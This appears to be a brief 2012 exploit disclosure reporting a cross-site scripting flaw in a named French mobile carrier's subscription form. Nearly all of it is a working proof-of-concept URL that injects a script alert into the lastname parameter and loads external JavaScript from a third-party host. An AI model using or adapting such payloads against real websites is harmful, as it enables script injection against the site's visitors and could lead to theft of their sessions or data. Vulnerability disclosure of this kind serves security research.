+-------------------------------------------------------------------------+
# Exploit Title : Mobile.free.fr - Website XSS (Cross Site Scripting)
# Author        : Atmon3r
# Date          : 02/03/2012
# Editor        : Mobile.free.fr
# Perso         : T'as free? t'as tout compris 
(http://www.dailymotion.com/embed/video/xchi4d)
# Xss type      : $_POST
+-------------------------------------------------------------------------+

[+] POC:

https://mobile.free.fr/subscribea/n_coordonnees.php?offre=n_illimite&freetelecom=strikeback&orderTunnelForm=orderTunnelForm&orderTunnelForm%3Agender=M&orderTunnelForm%3Alastname=/"><script>alert('Xss 
By Atm0n3r')</script><script type="text/javascript" 
src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>